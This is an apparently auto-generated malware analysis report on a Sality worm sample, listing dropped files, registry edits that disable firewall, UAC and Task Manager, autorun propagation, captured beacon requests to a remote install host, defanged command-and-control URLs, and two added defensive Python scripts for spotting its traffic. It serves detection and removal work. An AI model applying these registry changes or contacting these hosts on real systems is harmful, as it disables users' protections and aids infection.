Virus.Win32.Sality_a78e948b94

by malwarelabrobot on September 21st, 2015 in Malware Descriptions.

not-a-virus:AdWare.Win32.SwiftBrowse.o (Kaspersky), Virus.Win32.Sality.FD, Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Worm, Virus, Adware, WormAutorun


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: a78e948b9438fb5d0b463a9109373fed
SHA1: 2ef8856b7b309736cb5ced4a518da3facbd6b990
SHA256: 156fa42bd3c54c5730c66990be5c3c834b801c5bc82186e7771385c207dfb73e
SSDeep: 12288:EvHTO3scLzbKfI1s15Ap/G/8/3D0Fw/tN8dkmLtpHHHrh7OGwZpnZfI:EvHK3scL6j8/z0FmcLbH1OGwvnZg
Size: 659872 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:52:01
Analyzed on: WindowsXP SP3 32-bit


Summary:

Virus. A program that recursively replicates a possibly evolved copy of itself.

Payload

Behaviour: WormAutorun
Description: A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Virus's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Virus creates the following process(es):

%original file name%.exe:652
NetCrawl.mg.exe:1964

The Virus injects its code into the following process(es):

Explorer.EXE:532

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:652 makes changes in the file system.
The Virus creates and/or writes to the following file(s):

%WinDir%\system.ini (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (3039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (3277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (8400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (4136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2AB_Rar\%original file name%.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ilg (259958 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (7 bytes)

The Virus deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ilg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (0 bytes)

Registry activity

The process %original file name%.exe:652 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKCU\Software\Aas]
"a4_116" = "831618036"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Aas]
"a3_78" = "542637991"
"a3_79" = "549622726"
"a3_72" = "533156193"
"a3_73" = "506656128"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Aas\695404737]
"50183847" = "1F9250EF2381E2D9AE4EF061ECA0F3D0A24F2023E89C2CC85BD49E90D6877045BE906EB0B25DD268CB741DC41D5C0FD47CEE5BA9EC3B7870BCA79176776C9A465761F37DEECEAF24ABF58324DE41122D8DABCB3B58798401D9A821FDDE7FC8A4F09BD1E0428648329420F6E9AF57D2FFB6D3C8D7335A31244418C372DFCCE75F"

[HKCU\Software\Aas]
"a4_59" = "422978139"
"a4_58" = "415809018"

[HKCU\Software\Aas\695404737]
"21507363" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Aas]
"a3_98" = "685967115"
"a3_99" = "726580138"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Aas]
"a1_104" = "3321202338"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Aas\695404737]
"35845605" = "402"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Aas]
"a3_116" = "814879197"
"a3_117" = "821922428"
"a3_114" = "834001179"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Aas\695404737]
"28676484" = "35"

[HKCU\Software\Aas]
"a1_101" = "959177234"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Aas]
"a3_50" = "341766363"
"a3_51" = "348755322"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools" = "1"

[HKCU\Software\Aas]
"a4_88" = "630882648"
"a4_89" = "638051769"
"a2_100" = "716909694"

[HKCU\Software\Aas\695404737]
"14338242" = "0"
"7169121" = "217"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Aas]
"a1_96" = "4114495355"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Aas]
"a1_107" = "75537886"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 DF 10 C0 5B AE 62 FE 5E 62 5D 2E C7 01 CD 61"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Aas]
"a4_118" = "845956278"
"a4_117" = "838787157"

The Virus modifies IE security-zone settings so that all web nodes which bypass the proxy are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Firewall notifications are disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"

The Virus modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Task Manager is disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = "1"

The Virus modifies IE security-zone settings so that all local web nodes without dots in their names that are not assigned to any other zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Adds a rule to the Windows Firewall which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"

The Virus deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process NetCrawl.mg.exe:1964 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B EE FD F8 71 86 00 99 F2 FB 6D F8 2E 65 BA 8A"

Dropped PE files

MD5 File path
9b22fa552e37770118146e753a34d03f c:\xfdei.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Virus's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 22738 23040 4.49116 4dde9ee04459a4d76108ba4e7e9cf6a4
.rdata 28672 4496 4608 3.59034 a2c7710fa66fcbb43c7ef0ab9eea5e9a
.data 36864 253816 1024 3.1957 acf5fcee4a8110074c3935a8dde700a9
.ndata 290816 688128 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 978944 81920 80384 5.5234 b13f4a1cf59c57c4de44cfc5ec7498cd

URLs

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers

Traffic

GET /mg?alpha=Yy0QEkASO15SQ1hDPzhPXGRSAUU9PhQuABg9RxQvJy0LWFN1Bh0RLmVpemBlOCYQQDpqRnphBXc2M0tWZGVrE0IPKVd7TjADBB4DTHQycUIhMRZDHHUoWG5AFUMPUFxlfFEERTZRDWQuYW8MFBE/OxVHPHUCPR1bPD0cH1tmeGYSRQctWwQwRnsDEh9uWXAhBCwyABZCJiVEdn99bQw1YA== HTTP/1.1
User-Agent: WinHttpClient
Host: install.netcrawl.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP003C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:17 GMT
Content-Length: 184148

<<< skipped >>>

POST /mg?alpha=bCJoDyB3OAkNWi4aRyUvU2sqHCUyECYDUXxPdQ== HTTP/1.1

Content-Length: 246
Content-Type: application/x-www-form-urlencoded
User-Agent: WinHttpClient
Host: install.netcrawl.info
Connection: Keep-Alive

alpha=bCJoDyADD08zBl9NRyUvU2sqHCUyMWwzYBcyPwlPKCJzRTN6CWUMTmpmAn0FNyloXVplSQJ8ZXg5S1Y2a2oTDiIAJi9mLj8MfANjQ3tKbCIuPm5efHonIHMgGkx3TTxqcykZJTledXlObmB0CXEwNG1aXHoNRQA7MzJkAjtpdx4PJQgiIxlQSXR7D39hVgg8ZCM9eAsiKSo8ZXFcQWNNIGtzNgUkOFx0cUZqGz1uMBcgLg==
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP003C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:20 GMT
Content-Length: 0


GET /mg?alpha=ZipYEQsoExhAOykfdzsEZ24LHAtmbFpgfhBAXCVjFHwZAgk1X0VjFGNgWWVfOj5AQ3YSXjAWPHIue08UdSJiHH4efUReADZ3QzZrVi9y HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.netcrawl.info
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:17 GMT
Content-Length: 2004

<<< skipped >>>

GET /fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwrDTBZFm1oXg0reksiDXATNwteX0sAdxV9JRc2DT4cHkVxOzQTZV8nZ0l1IT8bIzJddX9eZUh+JDUgfg1iC3gZPykZZFkBIjRTbXEzTD8KNWUuGVxFQEIuTDp4FmUaQmhrUDMrZg40XjZnGmNzaRAgcRF6GAIRNAYycWFR HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: install.netcrawl.info
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:20 GMT
Content-Length: 0



GET /ii?alpha=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 HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: install.netcrawl.info
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Sun, 20 Sep 2015 01:39:20 GMT
Content-Length: 84
gtXkIIKIj6Yk95222VzDhJimNJ2G2qMt8IvZgnCClsH6apXd96EKsJyFpXOQnZK2IOyI/c9 nNODAqYod5Nu
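The two requests above share a signature worth alerting on: the User-Agent the NSIS Inetc download plug-in identifies itself with ("NSIS_Inetc (Mozilla)"), the /fp and /ii endpoints on install.netcrawl.info, and a single long base64-looking "alpha" parameter carrying the real payload. The script below is an added example, not part of the Lavasoft report, that parses a plain-text HTTP transcript and returns the requests matching that pattern; the transcript it runs on is constructed from the request line and headers shown above (with the alpha value shortened) plus one ordinary browser request for contrast.

```python
"""Added example: pick the NSIS installer beacons out of an HTTP transcript."""
import re

# Constructed transcript (not a real capture): the first request copies the
# request line and headers of the GET /fp beacon shown above, with the opaque
# 'alpha' value shortened; the second is an ordinary browser request for contrast.
SAMPLE_TRANSCRIPT = """\
GET /fp?alpha=cB8wD2sbaltIeCsAHyVkcVtjAmtwQyZ+Klceaw5hNRlhbG4hZUYNcXVAKQ48JRQxKxB4dCwIKW4EZlIJd0xJehUcb3Aae2IacgddER5bZHQwAitfP2IeZ3BsAHA3UHZ/SGwdbi1qNngYc1UsCDwr HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.netcrawl.info
Connection: Keep-Alive
Cache-Control: no-cache

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Host: www.example.com
Connection: Keep-Alive
"""

BEACON_UA_PREFIX = "NSIS_Inetc"        # User-Agent of the NSIS Inetc plug-in
BEACON_PATHS = {"/fp", "/ii"}          # endpoints seen in the capture above
OPAQUE_PARAM = "alpha"
OPAQUE_VALUE_RE = re.compile(r"^[A-Za-z0-9+/=]{64,}$")  # long base64-looking blob
REQUEST_LINE_RE = re.compile(r"^(GET|POST|HEAD)\s+(\S+)\s+HTTP/\d\.\d$")


def split_query(query):
    """Split a raw query string without percent- or plus-decoding, so a
    base64 value containing '+' keeps its characters."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = value
    return params


def parse_requests(transcript):
    """One dict per request block (blocks are separated by a blank line);
    blocks that do not start with a request line (responses) are skipped."""
    requests = []
    for block in re.split(r"\n\s*\n", transcript.strip()):
        lines = block.strip().splitlines()
        match = REQUEST_LINE_RE.match(lines[0])
        if not match:
            continue
        path, _, query = match.group(2).partition("?")
        headers = {}
        for line in lines[1:]:
            name, sep, value = line.partition(":")
            if sep:
                headers[name.strip().lower()] = value.strip()
        requests.append({
            "method": match.group(1),
            "path": path,
            "query": split_query(query),
            "headers": headers,
            "host": headers.get("host", ""),
        })
    return requests


def beacon_reasons(request):
    """Why a request looks like the installer's beacon; empty if it does not."""
    reasons = []
    if request["headers"].get("user-agent", "").startswith(BEACON_UA_PREFIX):
        reasons.append("nsis_inetc_user_agent")
    if request["path"] in BEACON_PATHS:
        reasons.append("installer_endpoint:" + request["path"])
    value = request["query"].get(OPAQUE_PARAM, "")
    if OPAQUE_VALUE_RE.match(value):
        reasons.append("opaque_%s_param:%d_chars" % (OPAQUE_PARAM, len(value)))
    return reasons


def find_beacons(transcript):
    """All requests in the transcript that carry at least one beacon trait."""
    hits = []
    for request in parse_requests(transcript):
        reasons = beacon_reasons(request)
        if reasons:
            hits.append({"host": request["host"], "path": request["path"],
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_TRANSCRIPT):
        print(hit["host"], hit["path"], ", ".join(hit["reasons"]))
```

The query string is split by hand rather than with urllib's parse_qs because parse_qs turns '+' into a space and would corrupt the base64 value before the length and alphabet check; any one of the three traits is enough to surface a request, so a changed endpoint or a new hostname still gets caught by the User-Agent.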


The Virus connects to the servers at the following location(s):

Explorer.EXE_532_rwx_01E00000_00002000:

SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.rsrc
.text

Explorer.EXE_532_rwx_01E10000_00001000:

|explorer.exeM_532_

Explorer.EXE_532_rwx_038F0000_0108E000:

c:\windows
hXXp://erenkarahan.com/images/logo.gif
hXXp://gutekpl.za.pl/logo.gif
hXXp://VVV.kapudane.com/logo.gif
hXXp://igorfomin.ru/logo.gif
hXXp://m2comunicacion.com/images/logo.gif
hXXp://leenaenterprises.com/img/logo.gif
hXXp://VVV.geriatriasinop.com.br/img/button.gif
hXXp://britishmotors.it/logo.gif
hXXp://artroom.com.tr/blog/logo.gif
hXXp://gammaconseil.fr/images/button.gif
hXXp://xexylia.com/logo.gif
%System%\drivers\olitq.sys
8317508876
SHELL32.DLL
ShellExecuteA
KERNEL32.DLL
.rsrc
.text
hXXp://89.119.67.154/testo5/
hXXp://kukutrustnet777.info/home.gif
hXXp://kukutrustnet888.info/home.gif
hXXp://kukutrustnet987.info/home.gif
KERNEL32.dll
USER32.dll
h.rdata
H.data
.reloc
ntoskrnl.exe
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)
Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion
hXXp://VVV.klkjwre9fqwieluoi.info/
hXXp://kukutrustnet777888.info/
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\ShellNoRoam\MUICache
%s:*:Enabled:ipsec
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
GdiPlus.dll
hXXp://
ipfltdrv.sys
VVV.microsoft.com
?%x=%d
&%x=%d
SYSTEM.INI
USER32.DLL
.%c%s
\\.\amsint32
NTDLL.DLL
autorun.inf
ADVAPI32.DLL
win%s.exe
%s.exe
WININET.DLL
InternetOpenUrlA
avast! Web Scanner
Avira AntiVir Premium WebGuard
cmdGuard
cmdAgent
Eset HTTP Server
ProtoPort Firewall service
SpIDer FS Monitor for Windows NT
Symantec Password Validation
WebrootDesktopFirewallDataService
WebrootFirewall
%d%d.tmp
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
%s\%s
%s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
Software\Microsoft\Windows\CurrentVersion\Ext\Stats
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Explorer.exe
A2CMD.
ASHWEBSV.
AVGCC.AVGCHSVX.
DRWEB
DWEBLLIO
DWEBIO
FSGUIEXE.
MCVSSHLD.
NPFMSG.
SYMSPORT.
WEBSCANX.
.adata
M_%d_
%c%d_%d
?456789:;<=
!"#$%&'()* ,-./0123
GetProcessHeap
GetWindowsDirectoryA
RegEnumKeyExA
RegDeleteKeyA
RegOpenKeyExA
RegCreateKeyA
RegCloseKey
SHFileOperationA
&3&3&3&389
.rdata
.data
rnl.exe?
= =$=(=,=0=4=8=<=@
rv:1.9.2.3)
.NEtCLR
.klkjw:9fqwiBu
f3a.sysB
D6c.pBTab
drfig%s:*:
0}.T&?%x=
~UrlA'W
\'Web%
HTTP)s'PJ
o.ENHCD
KPCKwWEBWUPD
>*?456789:;<=
!"#$%&'()* ,-./01230 0
ADVAPI32.dll
MSVCRT.dll
SHELL32.dll
WS2_32.dll
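The dump strings above mix defanged URLs (hXXp://, VVV.), registry paths, a driver and device name (olitq.sys, \\.\amsint32), format-string templates such as win%s.exe, and the value template %s:*:Enabled:ipsec. That last one has the shape of a Windows XP firewall exception entry (<path>:*:Enabled:<name>, the value format under SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List); that registry location is background knowledge, not something the report states. The script below is an added example, not part of the Lavasoft report, that turns such a dump listing into a sorted indicator summary; its input is a constructed selection of lines copied from the Explorer.EXE regions above.

```python
"""Added example: turn the defanged dump strings into an indicator summary."""
import re
from urllib.parse import urlsplit

# Constructed sample: a selection of lines copied from the Explorer.EXE
# memory-region dumps above (raw string so the backslashes stay literal).
SAMPLE_DUMP = r"""
hXXp://erenkarahan.com/images/logo.gif
hXXp://VVV.kapudane.com/logo.gif
hXXp://89.119.67.154/testo5/
hXXp://kukutrustnet777.info/home.gif
hXXp://VVV.klkjwre9fqwieluoi.info/
%System%\drivers\olitq.sys
\\.\amsint32
Software\Microsoft\Windows\CurrentVersion\policies\system
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
%s:*:Enabled:ipsec
win%s.exe
autorun.inf
avast! Web Scanner
SHELL32.DLL
.text
""".strip()

URL_RE = re.compile(r"^hxxps?://", re.IGNORECASE)
REG_RE = re.compile(r"^(HKLM\\|HKCU\\|HKEY_[A-Z_]+\\)?(SOFTWARE|SYSTEM)\\",
                    re.IGNORECASE)
DRIVER_RE = re.compile(r"\.sys$", re.IGNORECASE)
DEVICE_RE = re.compile(r"^\\\\\.\\")          # \\.\name, a kernel device object
# <path>:*:Enabled:<name> is the XP firewall AuthorizedApplications\List value
# format (my background knowledge; the page only shows the template string).
FIREWALL_RE = re.compile(r":\*:(Enabled|Disabled):")
TEMPLATE_RE = re.compile(r"%[sdcx]")          # printf-style placeholders


def refang(s):
    """Undo the report's defanging so the URL can be parsed normally."""
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)
    return s.replace("VVV.", "www.")


def triage(dump_text):
    """Classify each non-empty line; first matching category wins."""
    out = {"urls": [], "hosts": set(), "registry_keys": [], "drivers": [],
           "devices": [], "firewall_exceptions": [], "templates": []}
    for raw in dump_text.splitlines():
        s = raw.strip()
        if not s:
            continue
        if URL_RE.match(s):
            url = refang(s)
            out["urls"].append(url)
            out["hosts"].add(urlsplit(url).hostname)
        elif REG_RE.match(s):
            out["registry_keys"].append(s)
        elif FIREWALL_RE.search(s):
            out["firewall_exceptions"].append(s)
        elif DEVICE_RE.match(s):
            out["devices"].append(s)
        elif DRIVER_RE.search(s):
            out["drivers"].append(s)
        elif TEMPLATE_RE.search(s):
            out["templates"].append(s)
    out["hosts"] = sorted(out["hosts"])   # hosts are what goes on a blocklist
    return out


if __name__ == "__main__":
    for category, items in triage(SAMPLE_DUMP).items():
        print(category, items)
```

Hosts are de-duplicated and sorted because several URLs above differ only in path (logo.gif, button.gif, home.gif) and a blocklist wants one entry per host; the driver and device names are kept apart so they can be checked against the running system, and the firewall template is listed separately because the %s in it will be the path the sample chose at run time.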


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:652
    NetCrawl.mg.exe:1964

  2. Delete the original Virus file.
